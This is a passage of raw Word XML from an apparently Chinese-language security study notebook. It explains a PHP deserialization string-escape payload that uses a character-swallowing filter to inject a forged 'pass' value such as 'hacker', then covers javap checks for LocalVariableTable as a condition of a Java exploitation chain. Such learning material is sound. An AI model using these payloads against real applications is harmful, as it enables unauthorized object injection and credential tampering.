          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED227C" w14:textId="77777777" w:rsidR="00DF0709" w:rsidRDefault="00DF0709" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543D129B" w14:textId="542D8CB3" w:rsidR="00EE10CD" w:rsidRDefault="00EE10CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在就是</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:3:"212</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会被</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phpphpphpphpphpphpphp</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吃掉</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6D24E" w14:textId="77777777" w:rsidR="009E52AF" w:rsidRDefault="009E52AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0FBE70" w14:textId="68EEC893" w:rsidR="009E52AF" w:rsidRPr="009E52AF" w:rsidRDefault="009E52AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E901FC" w14:textId="66754E9A" w:rsidR="00EE10CD" w:rsidRDefault="00EE10CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE10CD">
        <w:t>O:1:"A":2:{s:4:"name";s:21:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phpphpphpphpphpphpphp";s:4:"pass";s:</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:"2</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A87E75" w:rsidRPr="00A87E75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0506CF83" w14:textId="77777777" w:rsidR="00EE10CD" w:rsidRDefault="00EE10CD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799F7244" w14:textId="77777777" w:rsidR="00EE10CD" w:rsidRPr="00EE10CD" w:rsidRDefault="00EE10CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5741AB6C" w14:textId="41AE2D46" w:rsidR="00DF0709" w:rsidRDefault="00DF0709" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拼接尾部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36487C0E" w14:textId="0C6B3C8F" w:rsidR="00844067" w:rsidRDefault="003B127D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据上面提到的残缺，直接构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，拼接尾部构成完整的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F80D0" w14:textId="0715FE66" w:rsidR="00844067" w:rsidRDefault="003B127D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B127D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:6:"hacker";}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F7EEA" w14:textId="3081D1F9" w:rsidR="003B127D" w:rsidRPr="003B127D" w:rsidRDefault="003B127D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003B127D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B092652" w14:textId="74372A1E" w:rsidR="00844067" w:rsidRPr="003B127D" w:rsidRDefault="003B127D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003B127D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>O:1:"A":2:{s:4:"name";s:21:"</w:t>
      </w:r>
      <w:r w:rsidR="00BD3582" w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phpphpphpphpphpphpphp";s:4:"pass";s:</w:t>
      </w:r>
      <w:r w:rsidR="00BD3582">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00BD3582" w:rsidRPr="00EE10CD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:"2</w:t>
      </w:r>
      <w:r w:rsidR="00BD3582">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BD3582" w:rsidRPr="00A87E75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00880A8D">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:6:"hac</w:t>
      </w:r>
      <w:r w:rsidRPr="00880A8D">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ker";}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373E1D9" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66895FDB" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FC4F3C" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9FF81C" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E96213" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154E78CE" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7D1790" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRPr="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570A2FAA" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185287E2" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF285F1" w14:textId="0A822474" w:rsidR="00346C07" w:rsidRDefault="00346C07" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124047AF" w14:textId="725198C6" w:rsidR="00510842" w:rsidRDefault="00B66EF7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc159779481"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="50829118" w14:textId="77777777" w:rsidR="000B7EA6" w:rsidRDefault="000B7EA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28930136" w14:textId="77777777" w:rsidR="00B52D72" w:rsidRDefault="00B52D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3F0301" w14:textId="056B0F71" w:rsidR="00B52D72" w:rsidRDefault="00B52D72" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="00BA0261">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="00BA0261">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码中的参数名信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F828804" w14:textId="77777777" w:rsidR="00BA0261" w:rsidRDefault="00BA0261" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D574428" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类构造函数的参数会有参数名信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>呢？只有当这个类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码带有调试信息且其中包含有变量信息时才会有。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE9404" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过如下命令来检查，如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> LocalVariableTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则证明</w:t>
      </w:r>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> class </w:t>
      </w:r>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节码里的函数参数会有参数名信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E11CFF" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRPr="00953C19" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953C19">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>javap -l &lt;class_name&gt; | grep LocalVariableTable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7722174F" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而我在多个不同的操作系统下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpenJDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle JDK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行测试，目前只发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CentOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpenJDK 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码调试信息中含有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LocalVariableTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（根据沈沉舟的文章，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RedHat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装包也会有，不过他并未说明是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpenJDK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oracle JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我未做测试）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF07DAD" w14:textId="71E52623" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总之可以得出结论的是，由于此利用链对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境的要求，实际渗透测试中满足此要求的环境还是占小部分，需要寻找更为通用的利用链。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A8400" w14:textId="77777777" w:rsidR="00BA0261" w:rsidRDefault="00BA0261" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019E62E5" w14:textId="6BF51E97" w:rsidR="00F86CAC" w:rsidRDefault="00F86CAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如，有无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LocalVariableTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CECC05" w14:textId="6DFE5781" w:rsidR="00964CBE" w:rsidRDefault="00F86CAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="516FCFB2" wp14:editId="29B5C191">
            <wp:extent cx="5274310" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6233350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35022" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3028950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F771FF" w14:textId="77777777" w:rsidR="00964CBE" w:rsidRDefault="00964CBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C385408" w14:textId="68D61BFF" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A6289" w14:textId="77777777" w:rsidR="00BA0261" w:rsidRPr="00BA0261" w:rsidRDefault="00BA0261" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50960457" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE678A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发工具包（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中的一个命令行工具，用于反汇编</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类文件。它可以显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类文件的字节码指令，帮助开发人员了解类的内部结构和实现细节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631574C" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEEC258" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可以查看类的成员、方法、字段以及常量池等信息。这对于了解和调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码很有帮助，特别是在需要深入了解编译后的字节码时。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA28B99" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC1B212" w14:textId="5CCBC03A" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的基本语法是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD92DEA" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap [options] [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C32787" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782AAC94" w14:textId="0F9A5E9E" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[options]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一些可选参数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是要反汇编的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的完全限定名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D0087" w14:textId="302C9C4E" w:rsidR="004C50F5" w:rsidRPr="00DE678A" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
